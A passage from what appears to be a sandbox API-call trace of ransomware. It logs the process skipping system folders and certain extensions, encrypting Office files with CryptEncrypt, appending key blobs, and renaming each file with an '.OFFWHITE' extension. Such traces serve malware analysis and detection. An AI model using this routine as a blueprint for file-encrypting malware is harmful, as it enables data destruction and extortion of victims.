ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0146.330] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".") returned 1 [0146.330] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="..") returned 1 [0146.330] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="...") returned 1 [0146.330] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="windows") returned 1 [0146.330] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="rsa") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="programdata") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="appdata") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="program files") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.331] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.331] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="XLINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" [0146.331] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.331] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.331] PathFindExtensionW (pszPath="XLINTL32.DLL.trx_dll") returned=".trx_dll" [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.331] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.331] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.331] GetProcessHeap () returned 0x500000 [0146.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ef8 [0146.332] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.332] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=145760) returned 1 [0146.332] GetProcessHeap () returned 0x500000 [0146.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.332] GetProcessHeap () returned 0x500000 [0146.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.332] GetProcessHeap () returned 0x500000 [0146.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.332] GetProcessHeap () returned 0x500000 [0146.332] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.332] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.332] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.332] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.333] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.333] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.333] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.333] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.333] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.333] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.333] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.333] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x23960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.333] SetLastError (dwErrCode=0x0) [0146.333] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.337] GetLastError () returned 0x0 [0146.337] GetLastError () returned 0x0 [0146.337] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x23a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.337] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.337] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x23b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.337] WriteFile (in: hFile=0x218, lpBuffer=0x546ef8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546ef8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.337] GetProcessHeap () returned 0x500000 [0146.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x23960) returned 0x5607c8 [0146.337] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.337] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x23960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x23960, lpOverlapped=0x0) returned 1 [0146.346] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.346] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x23960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x23960, lpOverlapped=0x0) returned 1 [0146.347] GetProcessHeap () returned 0x500000 [0146.347] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.347] CloseHandle (hObject=0x218) returned 1 [0146.347] GetProcessHeap () returned 0x500000 [0146.347] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.347] GetProcessHeap () returned 0x500000 [0146.347] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.347] GetProcessHeap () returned 0x500000 [0146.347] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.348] GetProcessHeap () returned 0x500000 [0146.348] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.348] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" [0146.348] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.OFFWHITE" [0146.348] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.offwhite")) returned 1 [0146.349] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="..") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="...") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="windows") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="rsa") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="programdata") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="appdata") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="program files") returned 1 [0146.349] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="program files (x86)") returned 1 [0146.349] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.349] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="XLINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" [0146.349] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.349] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.349] PathFindExtensionW (pszPath="XLINTL32.REST.trx_dll") returned=".trx_dll" [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.349] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.350] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.350] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.350] GetProcessHeap () returned 0x500000 [0146.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f08 [0146.350] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.350] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1206112) returned 1 [0146.350] GetProcessHeap () returned 0x500000 [0146.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.350] GetProcessHeap () returned 0x500000 [0146.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.350] GetProcessHeap () returned 0x500000 [0146.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.350] GetProcessHeap () returned 0x500000 [0146.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.350] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.350] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.351] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.351] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.351] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.351] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.351] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.351] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.351] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.351] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x126760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.351] SetLastError (dwErrCode=0x0) [0146.351] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.354] GetLastError () returned 0x0 [0146.354] GetLastError () returned 0x0 [0146.354] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x126860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.354] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.354] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x126960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.354] WriteFile (in: hFile=0x218, lpBuffer=0x546f08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546f08*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.354] GetProcessHeap () returned 0x500000 [0146.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0146.355] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.355] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x927c0, lpOverlapped=0x0) returned 1 [0146.410] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.410] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x927c0, lpOverlapped=0x0) returned 1 [0146.412] GetProcessHeap () returned 0x500000 [0146.412] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0146.416] CloseHandle (hObject=0x218) returned 1 [0146.417] GetProcessHeap () returned 0x500000 [0146.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.417] GetProcessHeap () returned 0x500000 [0146.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.417] GetProcessHeap () returned 0x500000 [0146.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.417] GetProcessHeap () returned 0x500000 [0146.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.417] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" [0146.417] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.OFFWHITE" [0146.417] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.offwhite")) returned 1 [0146.418] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="..") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="...") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="windows") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="rsa") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.418] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="programdata") returned 1 [0146.419] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="appdata") returned 1 [0146.419] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="program files") returned 1 [0146.419] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.419] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.419] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="XLSLICER.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" [0146.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.419] PathFindExtensionW (pszPath="XLSLICER.DLL.trx_dll") returned=".trx_dll" [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.419] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.419] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.419] GetProcessHeap () returned 0x500000 [0146.419] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f18 [0146.420] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.420] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=14688) returned 1 [0146.420] GetProcessHeap () returned 0x500000 [0146.420] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.420] GetProcessHeap () returned 0x500000 [0146.420] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.420] GetProcessHeap () returned 0x500000 [0146.420] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.420] GetProcessHeap () returned 0x500000 [0146.420] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.420] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.420] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.420] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.420] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.421] SystemFunction036 (in: RandomBuffer=0x5469f8, 